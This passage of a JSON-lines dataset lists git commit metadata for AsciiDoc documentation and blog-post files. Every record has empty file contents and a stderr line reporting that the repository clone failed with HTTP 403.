d1212\/elasticsearch,camilojd\/elasticsearch,gmarz\/elasticsearch,winstonewert\/elasticsearch,jbertouch\/elasticsearch,dpursehouse\/elasticsearch,strapdata\/elassandra,mmaracic\/elasticsearch,uschindler\/elasticsearch,MaineC\/elasticsearch,naveenhooda2000\/elasticsearch,MisterAndersen\/elasticsearch,s1monw\/elasticsearch,kaneshin\/elasticsearch,diendt\/elasticsearch,clintongormley\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mmaracic\/elasticsearch,coding0011\/elasticsearch,wuranbo\/elasticsearch,nomoa\/elasticsearch,cwurm\/elasticsearch,camilojd\/elasticsearch,mmaracic\/elasticsearch,gmarz\/elasticsearch,gingerwizard\/elasticsearch,obourgain\/elasticsearch,nazarewk\/elasticsearch,ESamir\/elasticsearch,fernandozhu\/elasticsearch,JackyMai\/elasticsearch,ESamir\/elasticsearch,glefloch\/elasticsearch,nazarewk\/elasticsearch,naveenhooda2000\/elasticsearch,qwerty4030\/elasticsearch,clintongormley\/elasticsearch,lks21c\/elasticsearch,IanvsPoplicola\/elasticsearch,camilojd\/elasticsearch,pozhidaevak\/elasticsearch,sreeramjayan\/elasticsearch,HonzaKral\/elasticsearch,andrejserafim\/elasticsearch,elasticdog\/elasticsearch,maddin2016\/elasticsearch,palecur\/elasticsearch,naveenhooda2000\/elasticsearch,trangvh\/elasticsearch,jimczi\/elasticsearch,i-am-Nathan\/elasticsearch,obourgain\/elasticsearch,GlenRSmith\/elasticsearch,rhoml\/elasticsearch,dpursehouse\/elasticsearch,episerver\/elasticsearch,rajanm\/elasticsearch,polyfractal\/elasticsearch,umeshdangat\/elasticsearch,qwerty4030\/elasticsearch,MaineC\/elasticsearch,ricardocerq\/elasticsearch,diendt\/elasticsearch,umeshdangat\/elasticsearch,glefloch\/elasticsearch,markharwood\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,uschindler\/elasticsearch,diendt\/elasticsearch,strapdata\/elassandra,jprante\/elasticsearch,rmuir\/elasticsearch,shreejay\/elasticsearch,JackyMai\/elasticsearch,mjason3\/elasticsearch,fforbeck\/elasticsearch,ricardocerq\/elasticsearch,awislowski\/elasticsearch,trangvh\/elasticsearch,girirajsharma\/elasticsearch,winstonewert\/elasticsearch,polyfractal\/elasticsearch,nezirus\/elasticsearch,kaneshin\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nezirus\/elasticsearch,IanvsPoplicola\/elasticsearch,girirajsharma\/elasticsearch,alexshadow007\/elasticsearch,Shepard1212\/elasticsearch,yynil\/elasticsearch,glefloch\/elasticsearch,markwalkom\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,trangvh\/elasticsearch,dpursehouse\/elasticsearch,wenpos\/elasticsearch,trangvh\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch,ESamir\/elasticsearch,nknize\/elasticsearch,i-am-Nathan\/elasticsearch,scottsom\/elasticsearch,nomoa\/elasticsearch,tebriel\/elasticsearch,sneivandt\/elasticsearch,winstonewert\/elasticsearch,avikurapati\/elasticsearch,JSCooke\/elasticsearch,LeoYao\/elasticsearch,maddin2016\/elasticsearch,masaruh\/elasticsearch,rhoml\/elasticsearch,nezirus\/elasticsearch,mohit\/elasticsearch,martinstuga\/elasticsearch,artnowo\/elasticsearch,kalimatas\/elasticsearch,dongjoon-hyun\/elasticsearch,a2lin\/elasticsearch,henakamaMSFT\/elasticsearch,myelin\/elasticsearch,ESamir\/elasticsearch,jimczi\/elasticsearch","old_file":"docs\/reference\/migration\/migrate_2_0\/java.asciidoc","new_file":"docs\/reference\/migration\/migrate_2_0\/java.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c28c69f5d6b4abebebd7b63558188de19cd7e966","subject":"Coordindation scalability doc.","message":"Coordindation scalability doc.\n","repos":"onyx-platform\/onyx,vijaykiran\/onyx","old_file":"doc\/design\/proposals\/coordination_scalability.adoc","new_file":"doc\/design\/proposals\/coordination_scalability.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vijaykiran\/onyx.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b311c593aac1b9fe8458fdf72a775fe08486579b","subject":"- Add table to map operators to property value types - Correct order by name to property name - Start working on an example for an event filter, still to be completed.","message":"- Add table to map operators to property value types\n- Correct order by name to property name\n- Start working on an example for an event filter, still to be completed.\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"95759ae279eedd211a094cfd9a33f95c59e42cbd","subject":"Fixing include path for demo container pom files.","message":"Fixing include path for demo container pom files.\n","repos":"woq-blended\/blended,lefou\/blended,woq-blended\/blended,lefou\/blended","old_file":"doc\/Docker.adoc","new_file":"doc\/Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lefou\/blended.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1295576cf04062ed0e45d0b0f05d97c131acb3d0","subject":"Added documentation for the models API Note: Not yet implemented","message":"Added documentation for the models API\nNote: Not yet implemented\n","repos":"npiganeau\/yep,hexya-erp\/hexya,hexya-erp\/hexya,npiganeau\/yep","old_file":"doc\/models.adoc","new_file":"doc\/models.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hexya-erp\/hexya.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dea7af374f2b6998fac95876f45d68ef3813971a","subject":"Update 2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","message":"Update 2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","new_file":"_posts\/2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c7ed9d15098da774b8d92fb79aeaaf93a2cdb75","subject":"Update 2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","message":"Update 2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","new_file":"_posts\/2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f925a588562acac1b0ef0d0e928d489f8fe34610","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d94e23d1bce2f951620e0e6b2cc31ae4a9a3d231","subject":"Create invoicing-dry-run.adoc","message":"Create invoicing-dry-run.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/subscription\/includes\/invoicing-dry-run.adoc","new_file":"userguide\/subscription\/includes\/invoicing-dry-run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"988a6b0b1b20d9e42f25ae339aabd41f07173c62","subject":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","message":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb7aa8f1891843d8aa4e3ff4fc74aaa4fb89243e","subject":"New blog post","message":"New blog post\n","repos":"skybon\/rigsofrods-website,skybon\/rigsofrods-website,skybon\/rigsofrods-website,skybon\/rigsofrods-website","old_file":"pregen\/source\/blog\/2015-07-07-coming-soon-new-home-page-and-wiki\/index.adoc","new_file":"pregen\/source\/blog\/2015-07-07-coming-soon-new-home-page-and-wiki\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skybon\/rigsofrods-website.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"13c7789f57ef57d7e905347a8b6cc759d16f53dd","subject":"y2b create post iPad 2 UNBOXING \\u0026 Hands On!","message":"y2b create post iPad 2 UNBOXING \\u0026 Hands On!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-11-iPad-2-UNBOXING-u0026-Hands-On.adoc","new_file":"_posts\/2011-03-11-iPad-2-UNBOXING-u0026-Hands-On.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b939d74e9853608988bb7af8db4e6d032ab35ba","subject":"Update 2015-04-21-How-to-Transparent-NavigationBar.adoc","message":"Update 2015-04-21-How-to-Transparent-NavigationBar.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-04-21-How-to-Transparent-NavigationBar.adoc","new_file":"_posts\/2015-04-21-How-to-Transparent-NavigationBar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1aa83674ce0ce64e097a62fc4aebbce6f3dc94b6","subject":"Update 2018-03-06-Creating-a-custom-select-element.adoc","message":"Update 2018-03-06-Creating-a-custom-select-element.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df0a2757020667d6cab1e81328e9f8ac63c2d34a","subject":"Update 2017-05-06-Migrate-Images-to-Sonata-Media.adoc","message":"Update 2017-05-06-Migrate-Images-to-Sonata-Media.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c94a8150c0b323493f90d04a5d0774f6f67b5cf","subject":"Update 2008-08-17-Meu-primeiro-site-hacked.adoc","message":"Update 2008-08-17-Meu-primeiro-site-hacked.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2008-08-17-Meu-primeiro-site-hacked.adoc","new_file":"_posts\/2008-08-17-Meu-primeiro-site-hacked.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45e03d7e883f33e1eb0b6b6fd9702c3cf4375475","subject":"y2b create post 3DS Case Giveaway WINNER!","message":"y2b create post 3DS Case Giveaway WINNER!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-05-05-3DS-Case-Giveaway-WINNER.adoc","new_file":"_posts\/2011-05-05-3DS-Case-Giveaway-WINNER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1644fd2adca780a6ed0ab69532401d296cb395fc","subject":"Update 2016-05-19-Backporting-Ubuntu-packages-C-Make.adoc","message":"Update 2016-05-19-Backporting-Ubuntu-packages-C-Make.adoc","repos":"codechunks\/codechunks.github.io,codechunks\/codechunks.github.io,codechunks\/codechunks.github.io,codechunks\/codechunks.github.io","old_file":"_posts\/2016-05-19-Backporting-Ubuntu-packages-C-Make.adoc","new_file":"_posts\/2016-05-19-Backporting-Ubuntu-packages-C-Make.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codechunks\/codechunks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c7b14826b14b9dfeb647c3cd4519de81e940077","subject":"Update 2017-12-03-visual-studio-code-extension.adoc","message":"Update 2017-12-03-visual-studio-code-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-03-visual-studio-code-extension.adoc","new_file":"_posts\/2017-12-03-visual-studio-code-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e1b110066efce93a5caece52288684934ae328c","subject":"Announcement for 1.7.0.Alpha1","message":"Announcement for 1.7.0.Alpha1\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-08-02-debezium-1-7-alpha1-released.adoc","new_file":"_posts\/2021-08-02-debezium-1-7-alpha1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cfd628903a3934d0942f253658d29c507b47f691","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a01d1e25758eec16c116fc5874d4b3cbfee231b3","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c67c9ef9bce928772940f1273551d9beeaa26f39","subject":"[examples] add readme to webserver example","message":"[examples] add readme to webserver example\n","repos":"GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold","old_file":"examples\/webserver\/README.adoc","new_file":"examples\/webserver\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GoogleContainerTools\/skaffold.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0bddbf6fe48415e67a5d5e78f0158cb977b78faf","subject":"Update 2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","message":"Update 2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","new_file":"_posts\/2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13628761cc52ee6f7ec88a881dd03d8089d695b8","subject":"Update 2016-03-29-Python.adoc","message":"Update 2016-03-29-Python.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Python.adoc","new_file":"_posts\/2016-03-29-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"749d71a43a6c3635a1f3bab9df07ae8085467b49","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4590f4823b67c6c2cf992c828304239f99b19fa","subject":"Update 2017-01-28-Inicio.adoc","message":"Update 2017-01-28-Inicio.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-01-28-Inicio.adoc","new_file":"_posts\/2017-01-28-Inicio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf405c155a30a8522dbe1332ef3d89ceae5b9002","subject":"Update 2017-08-23-Kotlin.adoc","message":"Update 2017-08-23-Kotlin.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-23-Kotlin.adoc","new_file":"_posts\/2017-08-23-Kotlin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb9659e36fd68dd0671d0fbc94897ed238b5d409","subject":"Deleted _posts\/2015-03-01-Notes-from-Mathiass-Unicode-talk.adoc","message":"Deleted _posts\/2015-03-01-Notes-from-Mathiass-Unicode-talk.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-03-01-Notes-from-Mathiass-Unicode-talk.adoc","new_file":"_posts\/2015-03-01-Notes-from-Mathiass-Unicode-talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dc634279aecd6eb728e38c581c7da227f599d49","subject":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","message":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5ba43b7b833cea2ed473e33f5c053df67e12586","subject":"Update 2017-06-17-Validacao-versus-Verificacao.adoc","message":"Update 2017-06-17-Validacao-versus-Verificacao.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-17-Validacao-versus-Verificacao.adoc","new_file":"_posts\/2017-06-17-Validacao-versus-Verificacao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ef37744db9d79c15c1d0fedbd32056c5732fcc1","subject":"Update 2017-06-30-First-work-of-my-data-sience.adoc","message":"Update 2017-06-30-First-work-of-my-data-sience.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da37585a26a94bed69f6daef3154327c0168629e","subject":"Update YubiKey_and_OpenVPN_via_PAM.adoc","message":"Update YubiKey_and_OpenVPN_via_PAM.adoc","repos":"eworm-de\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam,madrat-\/yubico-pam,madrat-\/yubico-pam","old_file":"doc\/YubiKey_and_OpenVPN_via_PAM.adoc","new_file":"doc\/YubiKey_and_OpenVPN_via_PAM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"ca6897b126e42f7184487c8ab7f4b798c304fba5","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95813cd76997a79dfc364d23719e2d304c865d79","subject":"Delete the file at '_posts\/2017-03-23-ASISCTF-QUAL-2017-Crows-knows.adoc'","message":"Delete the file at '_posts\/2017-03-23-ASISCTF-QUAL-2017-Crows-knows.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-03-23-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-03-23-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a22bc8e5b7de661e21592bb1c779a512ebbd47bd","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d63f31d86547ea240f828c3ac0d093ba044989b","subject":"Email notification plugin doc - WIP","message":"Email notification plugin doc - WIP","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/email-notification-plugin.adoc","new_file":"userguide\/tutorials\/email-notification-plugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"79e06eecfc470301afd280cfbf87a430cffff8ba","subject":"added lily's tumblr","message":"added lily's tumblr\n","repos":"hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,brechin\/hypatia,lillian-lemmer\/hypatia,brechin\/hypatia,Applemann\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d788740b0f105de5c0c479022aacbcb538866140","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b5597340d3b1139547bae58cbddab00ebbcde30","subject":"add docs on inserting data points","message":"add docs on inserting data points\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4054b2538a659cb3dfae87dd1269112b5505855a","subject":"zsh: Add a `prerequisites` section to the readme","message":"zsh: Add a `prerequisites` section to the readme\n\nThis section lists all the software, and the software's version, that is\nnecessary to use the zsh 